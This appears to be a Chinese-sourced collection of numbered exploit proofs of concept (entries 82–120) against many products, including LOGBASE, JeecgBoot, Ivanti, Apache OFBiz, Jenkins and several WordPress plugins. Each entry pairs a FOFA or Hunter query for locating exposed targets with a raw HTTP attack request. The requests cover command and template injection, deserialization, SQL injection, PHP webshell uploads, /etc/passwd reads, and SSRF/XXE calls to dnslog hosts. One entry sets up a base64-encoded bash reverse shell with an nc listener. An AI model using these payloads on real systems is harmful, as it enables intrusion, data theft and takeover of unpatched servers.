82. Sifudi (思福迪) LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The EXP request is as follows; it drops a Godzilla webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese Tosei self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. DBAPPSecurity (安恒) MingYu security gateway aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

Then request: /jfhatuwe.php

88. DBAPPSecurity MingYu security gateway aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

Then request: /astdfkhl.php

89. Seeyon FE collaborative office platform editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. Hikvision (海康威视) IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. Hikvision operations management center session command execution
Fastjson command execution
Hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. Qi'anxin (奇安信) NetGod SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then request:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi'anxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast HD intelligent recording and broadcasting system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML file contents; the XML file is as follows:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: [replace with your own token]
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthorized administrator creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

